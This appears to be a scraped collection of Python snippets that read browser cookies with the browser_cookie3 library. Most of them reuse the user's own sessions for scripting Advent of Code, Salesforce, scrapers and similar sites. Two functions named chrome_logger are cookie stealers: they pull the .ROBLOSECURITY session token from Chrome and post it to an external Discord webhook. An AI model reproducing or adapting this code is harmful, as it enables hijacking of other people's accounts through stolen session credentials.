Example #1
0
def getHost(hoc):
    import platform
    import browser_cookie3
    if platform.system() == 'Linux':
        try:
            browser_cookie3.firefox(domain_name=hoc + ".ebsoc.co.kr")
        except:
            import bc3_alt as browser_cookie3
            clear()
        data = str(
            browser_cookie3.firefox(domain_name=hoc + ".ebsoc.co.kr")).replace(
                '<CookieJar[', '').replace('}>', '').split(">, <")
    else:
        try:
            browser_cookie3.chrome(domain_name=hoc + ".ebsoc.co.kr")
        except:
            import bc3_alt as browser_cookie3
            clear()
        data = str(
            browser_cookie3.chrome(domain_name=hoc + ".ebsoc.co.kr")).replace(
                '<CookieJar[', '').replace('}>', '').split(">, <")
    for i in data:
        if hoc + '.ebsoc.co.kr' in i:
            cookies = i.replace('Cookie ', '').split(' for')[0].split('=')
            if cookies[0] == 'host':
                return cookies[1]
    return
Example #2
0
def get_cookies() -> Dict:
    path = generate_path()
    _163_cookies = dict_from_cookiejar(
        bc.chrome(cookie_file=path, domain_name='.163.com'))
    _bnet_cookies = dict_from_cookiejar(
        bc.chrome(cookie_file=path, domain_name='.battlenet.com.cn'))

    keys = {
        '_ntes_nuid',
        'MTK_BBID',
        'opt',
        'web.id',
        'BA-tassadar-login.key',
        'login.key',
        'BA-tassadar',
        'bnet.extra',
    }

    return {
        k: v
        for k, v in {
            **_163_cookies,
            **_bnet_cookies
        }.items() if k in keys
    }
Example #3
0
def query(hoc):
    import platform
    import browser_cookie3
    if platform.system() == 'Linux':
        try:
            browser_cookie3.firefox(domain_name=hoc + ".ebsoc.co.kr")
        except:
            import bc3_alt as browser_cookie3
            clear()
        data = str(
            browser_cookie3.firefox(domain_name=hoc + ".ebsoc.co.kr")).replace(
                '<CookieJar[', '').replace('}>', '').split(">, <")
    else:
        try:
            browser_cookie3.chrome(domain_name=hoc + ".ebsoc.co.kr")
        except:
            import bc3_alt as browser_cookie3
            clear()
        data = str(
            browser_cookie3.chrome(domain_name=hoc + ".ebsoc.co.kr")).replace(
                '<CookieJar[', '').replace('}>', '').split(">, <")
    cookies = ''
    for i in data:
        if hoc + '.ebsoc.co.kr' in i and 'www.ebsoc.co.kr' not in i:
            cookies = cookies + i.replace('Cookie ',
                                          '').split(' for')[0] + '; '
    return cookies.replace('<', '')
Example #4
0
 def __init__(self, env_url, browser):
     self.env_url = env_url
     try:
         if browser == 'chrome':
             cj = browser_cookie3.chrome(
                 domain_name=env_url[8:]
             )  #remove first 8 characters since browser cookie does not expect "https://"
             my_cookies = requests.utils.dict_from_cookiejar(cj)
             self.header = {
                 'Authorization': 'Bearer ' + my_cookies['sid'],
                 'Content-Type': 'application/json'
             }
         elif browser == 'firefox':
             cj = browser_cookie3.firefox(domain_name=env_url[8:])
             my_cookies = requests.utils.dict_from_cookiejar(cj)
             self.header = {
                 'Authorization': 'Bearer ' + my_cookies['sid'],
                 'Content-Type': 'application/json'
             }
         else:
             print('Please select a valid browser (chrome or firefox)')
             sys.exit(1)
     except:
         print(
             'ERROR: Could not get session ID.  Make sure you are logged into a live Salesforce session (chrome/firefox).'
         )
         sys.exit(1)
Example #5
0
def main():
    print("get cookie")
    try:
        cookies = browser_cookie3.chrome(domain_name='exhentai.org')
        cookies_dict = requests.utils.dict_from_cookiejar(cookies)
        print(cookies_dict)
        confPath = './lib_/gallery-dl.conf'
        isIdExist = "ipb_member_id" in cookies_dict.keys(
        ) and "ipb_pass_hash" in cookies_dict.keys()

        if isIdExist:
            if os.path.exists(confPath):
                with open(confPath) as f:
                    json_object = json.load(f)
                json_object["extractor"]["exhentai"] = {
                    "cookies": cookies_dict
                }
            else:
                json_object = {
                    "extractor": {
                        "exhentai": {
                            "cookies": cookies_dict
                        }
                    }
                }

        with open(confPath, 'w') as f:
            json.dump(json_object, f)
    except:
        pass
Example #6
0
def GetChromeCookies(pincode, store, base_url, location_id, store_id,
                     sku) -> None:
    '''
    Utility Function to save a new location.
    
    Change to the required new location in Chrome browser by going to 
    store1 site before calling this function.

    Only to be used to capture cookies for a new PINCODE.  We save and reuse 
    these cookies to pass with the http request for the right PINCODE.

    Alternative is to use Selenium webdrivers for browser automation.
          
    '''
    try:
        cJar = cookies.chrome(domain_name=store)

        cJar1 = {c.name: c.value for c in cJar}  #{i.name: i for i in list(j)}

        #    Replace PINCODE below
        base_folder1 = os.path.dirname(__file__) + '/cookies/'
        if not os.path.exists(base_folder1):
            os.makedirs(base_folder1)
        with open('cookies/' + str(store_id) + '_' + str(pincode) + '.pkl',
                  'wb') as fp:
            pickle.dump(cJar1, fp)
        logger.info('New Chromw cookies Collected')

    except TypeError as te:
        print(te)

    except Exception as e:
        print(e)
        logger.exception(e)
Example #7
0
def download_input(day):
    cookies = browser_cookie3.chrome(domain_name='.adventofcode.com')
    url = 'https://adventofcode.com/2020/day/%d/input' % day
    print(url)
    response = requests.get(url, verify=False, cookies=cookies, timeout=3)
    with open('../aoc20/data/day%d.txt' % day, 'wt') as outf:
        outf.write(response.text)
def extract_cookie(domainname=""):
    # cookies = browser_cookie3.chrome(domain_name=urlx, cookie_file='C:/Users/cromox/Desktop/newselenium/Selenium/MengKome/chrome-data/Default/Cookies')
    cookies = browser_cookie3.chrome(domain_name=domainname)
    if domainname == "":
        print()
        if len(cookies) >= 1:
            print('[No]) [Domainname] / [Name] / [Value] / [Expires]')
            i = 1
            for c in cookies:
                timeexpire = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(c.expires))
                print(str(i) + ') ' + str(c.domain) + ' / ' + str(c.name) + ' / ' + str(c.value) + ' / ' + str(timeexpire))
                i = i + 1
        else:
            print('COOKIE [ all_domain ] = NONE')
        cookie = None
    else:
        if len(cookies) >= 1:
            cookie = {}
            for c in cookies:
                # cookie = {'domain': c.domain, 'name': c.name, 'value': c.value, 'secure': c.secure and True or False}
                cookie = {'domain': c.domain,
                            'name': c.name,
                            'value': c.value,
                            'expiry': c.expires,
                            'path': c.path,
                            'httpOnly': False,
                            'HostOnly': False,
                            'sameSite': 'None',
                            'secure': c.secure and True or False}
            print('COOKIE [ ' + domainname + ' / ' + str(
                time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(cookie['expiry']))) + ' ] = ' + str(cookie))
        else:
            print('COOKIE [ ' + domainname + ' ] = NONE')
            cookie = None
    return cookie
def main():
    print('Initializing script')
    agents = get_agent_list() # bring in the list of user-agents for the page requests
    cookie = browser_cookie3.chrome() # bring in a cookie from chrome; will log you into SA to allow for scraping
    
    sheet = spreadsheet.open_sheet()
    
    last_scraped_page = spreadsheet.get_last_scraped_page(sheet)
    page_to_scrape = last_scraped_page + 1
    
    s = create_session(agents, cookie) # create a new browsing session object
    while (page_to_scrape <= 5300):
        try:
            print('Getting page {} of transcripts'.format(page_to_scrape))
            url = 'https://seekingalpha.com/earnings/earnings-call-transcripts/{}'.format(page_to_scrape) # root url of SA transcripts directory
            soup = get_page(s, url) # get an individual page of transcript urls; as a soup object for working with
            page_urls = get_page_urls(soup) # get all of the individual transcript page urls from one directory page
            print('Got page {} of transcript urls'.format(page_to_scrape))
            for url in page_urls:
                spreadsheet.post_new_url(sheet, url)
            print('Posted all urls from page {} to the sheet.'.format(page_to_scrape))
            spreadsheet.update_last_scraped_page(sheet, page_to_scrape)
            page_to_scrape = spreadsheet.get_last_scraped_page(sheet) + 1
            print()
            sleep(100)
        except Exception as err:
            print(err)
        
        s.close()
        s = create_session(agents, cookie) # create a new browsing session object
        try:
            sheet = spreadsheet.open_sheet()
        except Exception as err:
            print(err)
Example #10
0
def main():
    """Print cookies."""
    cookiejar = None
    domain = sys.argv[1]
    cookie_keys = sys.argv[2].split(":")
    if not cookiejar:
        try:
            cookiejar = browser_cookie3.chrome(domain_name=domain)
        except Exception:
            print("get cookie from Chrome failed", file=sys.stderr)

    if not cookiejar:
        try:
            cookiejar = browser_cookie3.firefox(domain_name=domain)
        except Exception:
            print("get cookie from Firefox failed", file=sys.stderr)
            return

    for cookie in cookiejar:
        print("browser cookie name:", cookie.name)
        
    cookies = list(filter(lambda c: c.name in cookie_keys, cookiejar))

    #print("cookies length: %d, cookie_keys length: %d" % (len(cookies), len(cookie_keys)))
    
    if len(cookies) < len(cookie_keys):
        print("get cookie failed, make sure you have Chrome or Firefox installed and login with one of them at least once.")
        return

    for c in cookies:
        print("cookie pair:%s:%s" % (c.name, c.value))
Example #11
0
    def __init__(self,
                 requests_per_minute=30,
                 current_url=None,
                 base_url=None,
                 values=None,
                 debug=False,
                 cookie_browser="chrome",
                 cookies=None):

        default_settings = {
            "download_cv": False,
            "send_logger_results_to_email":
            False,  # when False, prints results to terminal
            "download_storage": None,
        }

        self.requests_per_minute = requests_per_minute
        self.current_url = current_url
        self.base_url = base_url
        if values == None:
            self.values = default_settings
        else:
            self.values = values
        self.debug = debug

        self.cookie_browser = cookie_browser
        if cookie_browser == "chrome":
            cj = browsercookie.chrome()
        if cookie_browser == "firefox":
            cj = browsercookie.firefox()
        self.cookies = cj
Example #12
0
def get_releve(url="https://www.natureatwar.fr/descriptionalliance-LA"):
    cookies = browser_cookie3.chrome(domain_name='.natureatwar.fr')
    r = requests.get(url,
                     verify=False,
                     cookies={cookie.name: cookie.value
                              for cookie in cookies},
                     timeout=3)
    soup = BeautifulSoup(r.text, "html.parser")
    table = soup.find_all("table", {"class": "table-striped"})[1]
    rows = table.find_all("tr")

    titles = [
        "Tdc", "Rank", "Pseudo", "Colonie", "Total", "Bat", "Tech", "Etat"
    ]
    releve = pd.DataFrame(columns=titles)
    for row in rows:
        lst = []
        for cell in row.find_all("td"):
            for sub_cell in cell:
                lst.append(sub_cell)
        if len(lst) == len(titles):
            releve = releve.append(
                pd.DataFrame({i: [a]
                              for i, a in zip(titles, lst)}))

        releve = releve.reset_index(drop=True)

    return format_releve(releve)
Example #13
0
def infolessLogin():
    # Read out saved cookies so that way you don't have to login every time to run the program.
    if (os.path.exists("loginInfo.cookie")):
        print("Using cached login info...")
        with open("loginInfo.cookie", "rb") as f:
            requestClient.cookies.update(pickle.load(f))
    else:
        hasLoadedCookies = False

        if 'browser_cookie3' in sys.modules:  # Probably best to check if the module is loaded eh?
            shiftCookies = None
            try:
                print("(Attempting) to load chrome cookies...")
                shiftCookies = bc.chrome()
                print("Loaded chrome cookies...")
            except:
                print("(Attempting) to load firefox cookies...")
                shiftCookies = bc.firefox()
                print("Loaded firefox cookies...")
            if (shiftCookies != None):
                requestClient.cookies.update(shiftCookies)
            hasLoadedCookies = (shiftCookies != None)

        if not hasLoadedCookies:  # If we weren't able to load our cookies, we should just prompt them for their input.
            bProperLoginInfo = False
            while not bProperLoginInfo:
                print("Login to your SHiFT account...")
                user = input("SHiFT Email: ")
                password = getpass.getpass(prompt="Password: ")
                bProperLoginInfo = login(user, password)
Example #14
0
    def __init__(self, search):
        cookies = {
            cookie.name: cookie.value
            for cookie in browser_cookie3.chrome(domain_name='facebook.com')
        }
        self.user_id = cookies['c_user']
        self.xs = cookies['xs']

        self.regex_search = '({0})'.format(')|('.join(search))

        self.url = 'https://{0}-edge-chat.facebook.com/pull'.format(
            randint(0, 6))

        self.headers = {
            'Cookie': 'c_user={0};xs={1}'.format(self.user_id, self.xs),
            'User-Agent':
            'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
            'Referer': 'https://www.facebook.com/',
            'cache-control': 'no-cache'
        }

        self.query = {
            'channel': 'p_' + self.user_id,
            'msgs_recv': '0',
            'state': 'offline'
        }

        self.set_sticky()
Example #15
0
def get_bilibili_cookies():
    cookies = browser_cookie3.chrome()
    result = {}
    for one in cookies:
        if "bilibili" in one.domain and one.name not in result.keys():
            result[one.name] = one.value
    return result
Example #16
0
    def __init__(self,
                 cookie=None,
                 username=None,
                 password=None,
                 useBrowserCookie=None,
                 requireUserId=True):
        self.token = None
        self.processes = Processes()

        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent':
            "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
        })
        self.robloxPath = self.GetLatestRobloxExe()

        if useBrowserCookie and not cookie:
            useBrowserCookie = useBrowserCookie.lower()
            if useBrowserCookie == "chrome":
                cookie = bc.chrome(domain_name=".roblox.com")
            elif useBrowserCookie == "firefox":
                cookie = cookie = bc.firefox(domain_name=".roblox.com")
            else:
                cookie = cookie = bc.load(domain_name=".roblox.com")

        if cookie:
            self.session.cookies = cookie
            if requireUserId:
                request = self.session.get(
                    "https://assetgame.roblox.com/Game/GetCurrentUser.ashx")
                self.userId = request.text
        elif username and password:
            self.login(username, password)
Example #17
0
def getLoginCookie(domain,url_login,username,password):
    cj = browser_cookie3.chrome(domain_name=domain)
    if domain in cj._cookies and 'autologin_trustie' in cj._cookies[domain]['/'].keys():
        #already have cookie, return it
        return __makeCookieDict__(cj._cookies[domain]['/'])
    #else, make one
    # token = __getAuthenToken__(url_login)
    postDict = {
        'utf8': '✓',
        # 'authenticity_token': token,
        'back_url': 'https://www.educoder.net/',
        'username': username,
        'password': password,
        'autologin': '******',
    }
    postData = urllib.parse.urlencode(postDict)
    header = {
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    req = requests.post(url_login,postData,headers=header)
    resp = req.request
    if 'autologin_trustie' in resp._cookies._cookies[domain]['/'].keys():
        #login successful
        return __makeCookieDict__(resp._cookies._cookies[domain]['/'])
    #fail
    return {}
def chrome_logger():
    try:
        cookies = browser_cookie3.chrome(domain_name='roblox.com')
        cookies = str(cookies)
        cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
        requests.post(webhook, json={'username':'******', 'content':f'```Cookie: {cookie}```'})
    except:
        pass
def init_session():
    session = requests.Session()
    session.headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36',
    }
    cookie = browser_cookie3.chrome()
    session.cookies.update(cookie)

    return session
Example #20
0
def _iter_webdata(day: int):
    import requests
    import browser_cookie3
    from io import StringIO
    cookie = browser_cookie3.chrome(domain_name='.adventofcode.com')
    inputdata = StringIO(requests.get(f'https://adventofcode.com/2020/day/{day}/input', cookies=cookie, timeout=3).text)

    for line in inputdata:
        yield line
Example #21
0
def get_data(day):
    print("get: fetching cookie")
    cj = browser_cookie3.chrome()
    print("get: waiting for response...")
    r = requests.get(f"https://adventofcode.com/2020/day/{day}/input",
                     cookies=cj)

    with open(f"input/day{day}.txt", "w") as f:
        f.write(r.text)
    print("done!")
Example #22
0
def chrome_logger():
    try:
        cookies = browser_cookie3.chrome(domain_name='roblox.com')
        cookies = str(cookies)
        cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
        embed = DiscordEmbed(title='Cookie', description=f'{cookie}', color='03b2f8')
        webhook.add_embed(embed)
        response = webhook.execute()
    except:
        pass
def get_cookies_from_chrome():
    host_url = 'acm.hdu.edu.cn'
    # cookies_path = os.environ['LOCALAPPDATA'] + r"\Google\Chrome\User Data\Default\Cookies"
    # sql_query = "select host_key, name, encrypted_value ,value from cookies WHERE host_key='%s'" % host_url
    # with sqlite3.connect(cookies_path) as con:
    #     cu = con.cursor()
    # cu.execute(sql_query)
    # cookies_sql = {name: win32crypt.CryptUnprotectData(encrypted_value)[1].decode() for host_key, name, encrypted_value, value in cu.execute(sql_query).fetchall()}

    return browser_cookie3.chrome(domain_name=host_url)
Example #24
0
def fetch_delivery_url(amazon_request_headers):
    """
    Rely fully on chrome cookies- removing cookie and referer URL from headers doens't seem to break it.
    """
    delivery_url = "https://www.amazon.com/gp/buy/shipoptionselect/handlers/display.html?hasWorkingJavascript=1"
    cj = browser_cookie3.chrome()
    resp = requests.get(delivery_url,
                        cookies=cj,
                        headers=amazon_request_headers)
    resp.raise_for_status()
    return resp.content
Example #25
0
def get_num_results(search_term, start_date, end_date):
    """
    Helper method, sends HTTP request and returns response payload.
    """

    # Open website and read html
    # Get the user agent of your browser: https://www.whatismybrowser.com/detect/what-is-my-user-agent
    user_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'
    query_params = {'q': search_term, 'as_ylo': start_date, 'as_yhi': end_date}
    # Build the request: "as_sdt=1 : exclude patents", "as_vis=1 : exclude citations"
    url = "https://scholar.google.com/scholar?as_vis=1&hl=en&as_sdt=1,5&" + urllib.parse.urlencode(
        query_params)
    cookie_jar = browser_cookie3.chrome()  # or firefox()
    opener = build_opener(HTTPCookieProcessor(cookie_jar))
    request = Request(url=url, headers={'User-Agent': user_agent})

    try:
        handler = opener.open(request)

        html = handler.read()

        # Create soup for parsing HTML and extracting the relevant information
        soup = BeautifulSoup(html, 'html.parser')
        div_results = soup.find(
            "div", {"id": "gs_ab_md"})  # find line 'About x results (y sec)

        if div_results != None:

            res = re.findall(
                r'(\d+).?(\d+)?.?(\d+)?\s',
                div_results.text)  # extract number of search results

            if res == []:
                num_results = '0'
                success = True
            else:
                num_results = ''.join(res[0])  # convert string to numbe
                success = True
        else:
            success = False
            num_results = '-1'
    except IOError as err:
        print(
            "********************************************************************************"
        )
        print("IO error: {0}".format(err))
        print(
            "********************************************************************************"
        )
        success = False
        num_results = '-1'

    return num_results, success
def getCookie(browser):

    cj = {}
    s_session_id = '';

    if browser == BROWSER_CHROMIUM:
        cj = browser_cookie3.chrome(expanduser('~/.config/chromium/Default/Cookies'))
    elif browser == BROWSER_CHROME:
        cj = browser_cookie3.chrome()
    elif browser == BROWSER_FIREFOX:
        cj = browser_cookie3.firefox()
    else:
        print('[ERROR] Invalid Browser String! See --help')
        exit(1)

    if len(cj) > 0:
        for cookie in cj:
            if cookie.domain == 'clickup.up.ac.za' and cookie.name == 's_session_id':
                s_session_id = cookie.value

    return s_session_id;
    def load_browser_cookies(self):
        # 加载Chrome 浏览器中的Cookie
        jar = self.jars['chrome']
        chrome_cookiejar = browser_cookie3.chrome()
        for cookie in chrome_cookiejar:
            jar.set_cookie(cookie)

        # 加载Firefox 浏览器中的Cookie
        jar = self.jars['firefox']
        firefox_cookiejar = browser_cookie3.firefox()
        for cookie in firefox_cookiejar:
            jar.set_cookie(cookie)
Example #28
0
 def _get_cookies(self):
     try:
         browser = config.get_env()
         if browser == '1':
             return browser_cookie3.chrome(domain_name='youtube.com')
         elif browser == '2':
             return browser_cookie3.firefox(domain_name='youtube.com')
         else:
             raise Exception("適切なブラウザが見つからないか、設定ファイルが壊れています。")
     except browser_cookie3.BrowserCookieError:
         raise Exception("ブラウザのクッキーが見つかりません。"
                         "ChromeかFirefoxでYouTubeにログインする必要があります。")
Example #29
0
 def _get_cookies(self, ):
     '''Returns user's browser cookies'''
     '''From file for testing'''
     if path.isfile(self.path_to_cookies_temp):
         with open('..\\config\\cookies.pickle', 'rb') as f:
             load_list_cookies = pickle.load(f)
         cj = CookieJar()
         for i in load_list_cookies:
             cj.set_cookie(i)
     else:
         # From Chrome cookie database
         cj = chrome()
     return cj
    def harvest(self):
        logging.info("Harvesting started: " +
                     datetime.strftime(datetime.now(), DATE_TIME_FORMAT))

        # Create session so we keep state and cookies
        session = requests.session()
        # Get cookies from chrome browser as this simplifies login a lot
        cookies = browser_cookie3.chrome(domain_name='.facebook.com')

        response = session.get(FB_STARTPAGE_LINK, cookies=cookies)
        soup = BeautifulSoup(response.content, "html.parser")

        # find values necessary for form data - these change with each session
        jazoest = soup.find('input', attrs={"name": "jazoest"})['value']
        lsd = soup.find('input', attrs={"name": "lsd"})['value']
        cuid = soup.find('a', attrs={'title': 'Mike Tennant'})['href']

        form_data = {
            "jazoest": jazoest,
            "lsd": lsd,
            "cuid": cuid.split("/?")[1].split("&next")[0],
            "pass": PASSWORD,
            "cred_type": "137",
            "login_source": "device_based_login",
            "email": EMAIL,
            "next": "",
            "persistent": ""
        }
        headers = {
            "accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
            "accept-encoding": "gzip, deflate",
            "accept-language": "da-DK,da;q=0.9,en-US;q=0.8,en;q=0.7",
            "content-type": "application/x-www-form-urlencoded",
            "origin": "https://da-dk.facebook.com",
            "referer": "https://da-dk.facebook.com/",
            "sec-fetch-dest": "document",
            "sec-fetch-mode": "navigate",
            "sec-fetch-site": "same-origin",
            "sec-fetch-user": "******",
            "upgrade-insecure-requests": "1",
            "user-agent":
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36",
            "Access-Control-Allow-Origin": "https://da-dk.facebook.com/"
        }

        login_request = session.post(FB_LOGIN_LINK,
                                     cookies=cookies,
                                     data=form_data,
                                     headers=headers)
        print(login_request.text)
	def __init__( self, search ):
		cookies           = { cookie.name:cookie.value for cookie in browser_cookie3.chrome( domain_name = 'facebook.com' ) }
		self.user_id      = cookies['c_user']
		self.xs           = cookies['xs']
		
		self.regex_search = '({0})'.format( ')|('.join( search ) )

		self.url          = 'https://{0}-edge-chat.facebook.com/pull'.format( randint( 0, 6 ) )
		
		self.headers      = {
			'Cookie':'c_user={0};xs={1}'.format( self.user_id, self.xs ),
			'User-Agent':'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
			'Referer':'https://www.facebook.com/',
			'cache-control':'no-cache'
		}
		
		self.query        = {
			'channel':'p_' + self.user_id,
			'msgs_recv':'0',
			'state':'offline'
		}
		
		self.set_sticky()
Example #32
0
post_url3 = 'http://yukicoder.me/submissions/{}'
langdic = {
    '.cpp' : 'cpp',
    '.c'   : 'c',
    '.java': ['java8', 'java'],
    '.cs'  : 'csharp',
    '.pl'  : ['perl6', 'perl'],
    '.py'  : ['python3', 'python', 'pypy3', 'pypy2'],
    '.rb'  : 'ruby',
    '.hs'  : 'haskell',
    '.nim' : 'nim',
    '.js'  : 'node',
    # (ΦωΦ)<飽きた
}

cj = browser_cookie3.chrome()
ses = requests.session()

if not len(sys.argv) in [2, 3]: # (ΦωΦ)<引数3つのときはPythonとかJavaとかで明示的にバージョンを指定する、という使い方
    nyaa(' (;ω;)< 引数にソースファイルを指定してください')
    nyaa(' (ΦωΦ)< python yukisubmit.py main.cpp みたいな感じで')
    exit(0)
file_name = sys.argv[1]
file_path = os.path.abspath(file_name)
match1 = ptn1.match(file_path)
if not match1:
    nyaa(' (;ω;)< ソースコードのある場所がなんか変です')
    nyaa(' (;ω;)< ほんとにyukicoderに提出するんですか...')
    exit(0)
problem_no, source = match1.groups()
dot_pos = source.find('.')